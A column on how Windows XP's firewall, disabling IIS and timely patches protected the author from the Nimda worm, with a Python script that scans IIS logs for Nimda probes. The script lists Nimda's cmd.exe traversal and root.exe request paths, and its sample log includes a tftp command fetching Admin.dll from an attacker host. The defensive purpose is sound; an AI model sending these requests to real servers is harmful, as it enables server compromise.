Windows and Office updates protected many from Nimda

First, the release of Nimda was a horrible thing on so many levels: the timing could not have been worse, and it is a ruthless piece of work. In case you have been living in a cave, Nimda is a Code Red-style worm that also spreads as an email virus. Infected servers send HTTP requests to other web servers, probing for IIS hosts they can infect. Infected client machines send out emails with a random subject line and a README.EXE attachment, and in some cases merely opening (or previewing) the message is enough to infect the machine.

This virus has struck a personal note with me, since my internet connection is still slow (because my ISP has infected machines all over its network) and because I have learned that someone has been spoofing my outlookexchange.com email address. I found out about the spoofing from replies from angry recipients. I can guess that one of two things happened: 1) someone had been spoofing my address all along and then got infected by Nimda, or 2) someone spoofed my email address in order to spread the virus.

Nicolas Blank helped immensely in tracking down the problem. As I said before, I received approximately thirty emails from various systems informing me that I had sent them a virus. None of the recipients were in my address lists, and a quick scan proved that I was not infected. After some research I now understand why I was safe. I will explain.

Server Security

I have several servers, including my notebook computer. My notebook runs Windows XP, which has a built-in firewall (Internet Connection Firewall). I turn that on by default, since I am usually at a customer site and keep confidential information about other projects and internal Microsoft documents on my machine. With the firewall on, unsolicited inbound connections, including the HTTP probes Nimda sends, are dropped before they reach any listening service.

To the right, you can see the configuration screen for this feature.

In my case, I use an additional level of security, which is simply not to run the IIS service. I know this sounds a little too simple, but Nimda's server-side attack targets IIS: if the service is not running, there is nothing for its HTTP probes to exploit. Note that this protects the server role, not the whole box; the machine can still be infected through the worm's other vectors (email, open file shares, and browsing an infected web site). In fact, I disable the service on any machine that does not specifically need it.
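The HTTP probes described above are easy to spot in IIS logs, and checking the log is the quickest way to tell whether a server that was running IIS was merely scanned or actually hit. The Python script below is an added example for this column, not code from the original; it parses W3C-format IIS log lines, matches the request paths Nimda used when scanning (the list published in CERT Advisory CA-2001-26), flags unlisted encodings of the same cmd.exe traversal, and reports per client whether any probe returned HTTP 200. The log excerpt embedded in it is constructed for the example, not a real capture.

```python
"""Spot Nimda propagation probes in IIS W3C logs (added example, not the column's code).

Probe paths are the ones Nimda requested when scanning for IIS servers,
as listed in CERT Advisory CA-2001-26. The sample log below is constructed.
"""
import re
from collections import namedtuple

Hit = namedtuple("Hit", "line_no client stem query status verdict")

# Request paths Nimda sent to find vulnerable IIS hosts (CERT CA-2001-26).
# root.exe is the backdoor Code Red II left behind; the cmd.exe paths use
# the IIS Unicode (%c0%af, %c1%1c ...) and double-decode (%255c) traversals.
NIMDA_PROBE_PATHS = {p.lower() for p in (
    "/scripts/root.exe",
    "/MSADC/root.exe",
    "/c/winnt/system32/cmd.exe",
    "/d/winnt/system32/cmd.exe",
    "/scripts/..%255c../winnt/system32/cmd.exe",
    "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe",
    "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe",
    "/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe",
    "/scripts/..%c1%1c../winnt/system32/cmd.exe",
    "/scripts/..%c0%2f../winnt/system32/cmd.exe",
    "/scripts/..%c0%af../winnt/system32/cmd.exe",
    "/scripts/..%c1%9c../winnt/system32/cmd.exe",
    "/scripts/..%%35%63../winnt/system32/cmd.exe",
    "/scripts/..%%35c../winnt/system32/cmd.exe",
    "/scripts/..%25%35%63../winnt/system32/cmd.exe",
    "/scripts/..%252f../winnt/system32/cmd.exe",
)}

# Generic rule for variants: ".." followed by a slash, backslash or an escape
# somewhere in a request for cmd.exe. IIS may log the stem after one round of
# decoding, so %255c can show up as %5c; this catches those forms too.
TRAVERSAL_RE = re.compile(r"\.\.(?:/|\\|%)")


def parse_w3c(lines):
    """Yield (line_no, record) per W3C log record, naming columns from the #Fields: header."""
    fields = None
    for n, line in enumerate(lines, 1):
        line = line.rstrip("\r\n")
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError(f"line {n}: record before any #Fields: header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # truncated or garbled record
        yield n, dict(zip(fields, values))


def classify(stem, query):
    """Return a verdict for one request, or None if it looks benign."""
    s, q = stem.lower(), query.lower()
    if s in NIMDA_PROBE_PATHS:
        # After a probe succeeded, the worm used tftp to pull Admin.dll onto the server.
        return "nimda-tftp" if "tftp" in q else "nimda-probe"
    if s.endswith("/root.exe"):
        return "root.exe"       # someone exercising the Code Red II backdoor
    if "cmd.exe" in s and TRAVERSAL_RE.search(s):
        return "traversal"      # unlisted encoding of the same attack
    return None


def scan(lines):
    """Return a Hit for every suspicious record in the log."""
    hits = []
    for n, rec in parse_w3c(lines):
        stem, query = rec.get("cs-uri-stem", ""), rec.get("cs-uri-query", "-")
        verdict = classify(stem, query)
        if verdict:
            hits.append(Hit(n, rec.get("c-ip", "?"), stem, query, rec.get("sc-status", "?"), verdict))
    return hits


def summarize(hits):
    """Per client: probe count, whether any probe got HTTP 200, whether tftp was attempted."""
    out = {}
    for h in hits:
        e = out.setdefault(h.client, {"probes": 0, "succeeded": False, "tftp": False})
        e["probes"] += 1
        e["succeeded"] |= (h.status == "200")
        e["tftp"] |= (h.verdict == "nimda-tftp")
    return out


# Constructed IIS 5 log excerpt (not a real capture); 198.51.100.7 plays an infected host.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-09-18 14:02:11
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2001-09-18 14:02:11 192.0.2.44 GET /default.htm - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0)
2001-09-18 14:02:13 198.51.100.7 GET /scripts/root.exe /c+dir 404 -
2001-09-18 14:02:13 198.51.100.7 GET /MSADC/root.exe /c+dir 404 -
2001-09-18 14:02:14 198.51.100.7 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 14:02:14 198.51.100.7 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 14:02:15 198.51.100.7 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+tftp%20-i%20198.51.100.7%20GET%20Admin.dll%20d:\\Admin.dll 200 -
2001-09-18 14:03:02 203.0.113.9 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 14:03:40 192.0.2.44 GET /images/logo.gif - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0)
"""

if __name__ == "__main__":
    for client, info in summarize(scan(SAMPLE_LOG.splitlines())).items():
        flag = "COMPROMISED?" if info["succeeded"] else "probed only"
        print(f"{client}: {info['probes']} probe(s), tftp={info['tftp']} -> {flag}")
```

The status code is the detail that matters: a 404 on these requests means the server was scanned but the command did not run, while a 200 means cmd.exe (or the root.exe backdoor) executed for the remote client. A host with a 200 should be treated as compromised rather than simply patched, because Nimda also enabled the Guest account, added it to Administrators and shared the local drives. Point the script at a real log by replacing SAMPLE_LOG with the lines of a file from the IIS log directory.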

Windows Update

The rest of my servers are updated manually at regular intervals. I connect to Windows Update and make sure that the OS, IIS and any new security patches are applied. In fact, the holes Nimda exploits were closed months before it appeared: the IIS Unicode directory-traversal fix (MS00-078) shipped in October 2000, the IIS double-decode fix (MS01-026) in May 2001, and the Internet Explorer MIME-handling fix (MS01-020) that stops the README.EXE attachment from running when a message is opened or previewed in March 2001. If you stay on top of this, through either automatic or manual processes, you will be in far better shape when the next new hole is opened or otherwise exposed.

Disclaimer: Your use of the information contained in these pages is at your sole risk. All information on these pages is provided "as is", without any warranty, whether express or implied, of its accuracy, completeness, fitness for a particular purpose, title or non-infringement, and none of the third-party products or information mentioned in the work are authored, recommended, supported or guaranteed by Stephen Bryant or Pro Exchange. OutlookExchange.Com, Stephen Bryant and Pro Exchange shall not be liable for any damages you may sustain by using this information, whether direct, indirect, special, incidental or consequential, even if it has been advised of the possibility of such damages.

Copyright Stephen Bryant 2008